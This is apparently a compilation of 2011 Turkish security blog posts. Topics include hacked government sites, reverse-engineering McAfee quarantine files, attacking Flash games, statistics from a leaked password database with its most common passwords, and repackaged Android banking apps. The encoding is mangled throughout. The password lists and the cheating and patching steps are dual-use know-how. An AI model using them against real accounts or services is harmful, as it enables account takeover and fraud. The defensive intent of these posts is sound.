Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 25: Hack 4 Career - 2011

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

